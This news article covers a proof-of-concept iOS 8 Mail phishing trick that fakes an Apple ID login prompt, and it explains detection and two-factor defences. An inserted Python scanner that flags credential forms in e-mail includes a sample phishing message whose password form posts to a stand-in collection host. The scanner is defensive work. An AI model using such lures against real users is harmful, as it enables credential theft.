iPhone Phishing Attack Could Steal Apple Accounts

As always, be glad that security researchers are better at finding flaws than cybercriminals are. A new proof-of-concept exploit demonstrates an extremely clever, and potentially devastating, phishing scam on iPhones and iPads. Just by receiving an e-mail, iOS users — even very savvy ones — could fall victim to a convincing but fake login screen that would steal the username and password for their Apple accounts.

The British tech blog The Register spoke with Jan Souček, an Ernst & Young security consultant based in Prague, who explained that he fooled the Mail app built into iOS 8 with a tool of his own creation called iOS-Mail.app-inject-kit. Souček's tool wraps e-mail messages in 20 lines of deceptive Web formatting that, when viewed on an iOS device, brings up a fake Apple ID login screen that looks perfectly real.


Souček rooted out the vulnerability and told Apple about it back in January, but he said Apple has declined to patch the issue. So he decided to take the flaw public. Unlike many phishing pop-ups, which require JavaScript, Souček built the Mail.app phishing tool using only HTML and its companion style-sheet language, CSS, both of which the iOS Mail app renders by default.

What really makes the Mail.app trick dangerous is that it replicates predictable iOS behavior. iOS 8 really does ask users to sign in to confirm their identity periodically, especially when using the built-in Mail app. Users could delete every suspicious e-mail that comes their way, but still end up handing over their Apple account credentials (and with them their iTunes Store balances, iCloud accounts and iPhone photo backups) to phishers without ever knowing it.

There is one easy way to detect Souček's phishing tool: press the Cancel button when the login prompt appears. With real iOS notifications, pressing Cancel will cause the prompt to reappear until you log in. With HTML/CSS modifications, even very clever ones, pressing Cancel will cause the prompt to disappear. If Mail asks you to log in, pressing Cancel once couldn't hurt, and only costs you about a second.
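The Cancel test above works once the message is already on the phone. A mail gateway can apply the same reasoning earlier: a legitimate e-mail body has no reason to carry a login form, so any HTML part containing a password input, or a form that posts somewhere other than Apple's own hosts, deserves to be flagged before Mail.app ever renders it. The scanner below is an added illustration written for this article; it is not Souček's kit, Apple code, or any vendor's product. The allow-list of trusted form hosts and both sample messages are constructed for the example.

```python
"""Gateway heuristic: flag HTML e-mail bodies that carry a credential form.

Added example, not code from the original article or from the tool it
describes. Assumptions: a defender scans raw RFC 822 messages before
delivery, and only forms posting to the constructed allow-list below
are considered plausible sign-in forms.
"""
from email import message_from_string
from email.message import Message
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allow-list for the example; not an official Apple list.
TRUSTED_FORM_HOSTS = ("apple.com", "icloud.com")


def _is_trusted_host(host: str) -> bool:
    """Exact or subdomain match only, so 'apple.com.evil.example' fails."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in TRUSTED_FORM_HOSTS)


class LoginFormScanner(HTMLParser):
    """Collects form actions, counts password inputs, notes 'Apple ID' text."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self.mentions_apple_id = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_fields += 1

    def handle_data(self, data):
        if "apple id" in data.lower():
            self.mentions_apple_id = True


def _html_parts(msg: Message):
    """Yield every decoded text/html part, whether or not the mail is multipart."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True) or b""
            yield raw.decode(part.get_content_charset() or "utf-8", "replace")


def scan_email(raw_message: str) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    for html in _html_parts(message_from_string(raw_message)):
        scanner = LoginFormScanner()
        scanner.feed(html)
        if scanner.password_fields:
            findings.append("html body contains a password input field")
        for action in scanner.form_actions:
            host = urlparse(action).hostname or ""
            if not _is_trusted_host(host):
                findings.append(
                    "form posts to untrusted host %s" % (host or "(relative url)"))
        if scanner.password_fields and scanner.mentions_apple_id:
            findings.append("password prompt styled as an Apple ID sign-in")
    return findings


# Constructed sample messages for the example.
BENIGN_EMAIL = """\
From: news@newsletter.example
To: user@example.net
Subject: Weekly digest
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body><p>Here is this week's digest.</p><a href="https://newsletter.example/read">Read more</a></body></html>
"""

SUSPICIOUS_EMAIL = """\
From: receipts@mail-check.example
To: user@example.net
Subject: Your receipt
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body><p>Your Apple ID session has expired. Sign in to continue.</p>
<form action="https://mail-check.example/collect" method="post">
<input type="text" name="id"><input type="password" name="pw">
</form></body></html>
"""

if __name__ == "__main__":
    for label, mail in (("benign", BENIGN_EMAIL), ("suspicious", SUSPICIOUS_EMAIL)):
        print(label, scan_email(mail) or "clean")
```

The heuristic deliberately keys on structure (a password field, a form action) rather than on the exact CSS Souček used, so it does not depend on knowing his 20 lines; a body with no form at all passes, and a form that posts anywhere outside the allow-list is reported even when the page text never mentions Apple.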

Those who do fall for such tricks will be protected from Apple account takeovers if they've enabled two-factor authentication. With that feature turned on, Apple will send a numeric code via text message or Find My iPhone/iPad message to a second device belonging to the registered user, and the user must enter the code into the first device to log in.

Keep in mind that the Mail.app phish has never been seen in the wild, and now that Souček has made it public, Apple will probably patch it soon. It's just a good reminder that while 99 percent of phishing scams are transparent and easy to spot, there's always that outlier that could throw even tech-savvy users for a loop.

Marshall Honorof is a senior writer for Tom's Guide. Contact him at mhonorof@tomsguide.com. Follow him @marshallhonorof. Follow us @tomsguide, on Facebook and on Google+.